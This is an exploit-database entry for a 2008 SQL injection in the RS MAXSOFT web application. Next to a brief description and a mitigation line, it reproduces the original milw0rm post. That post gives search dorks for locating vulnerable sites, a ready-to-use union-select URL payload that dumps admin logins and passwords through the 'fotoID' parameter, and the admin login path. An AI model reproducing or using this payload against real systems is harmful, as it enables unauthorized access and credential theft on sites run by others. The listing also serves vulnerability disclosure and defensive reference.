header-logo
Suggest Exploit
vendor:
RS MAXSOFT Web Application
by:
S@BUN
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RS MAXSOFT Web Application
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Provozováno na RS MAXSOFT SQL-Injection

A vulnerability exists in the RS MAXSOFT web application which allows an attacker to inject malicious SQL queries via the 'fotoID' parameter in the 'modules/fotogalerie/popup_img.php' script. This can be exploited to gain access to the admin panel by using the 'union select' statement to concatenate the login and password from the 'admin' table.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection


#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title

EXPLOiT:

modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin


ADMiN LOGiN=admin.php?page=logfrm


###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-04-10]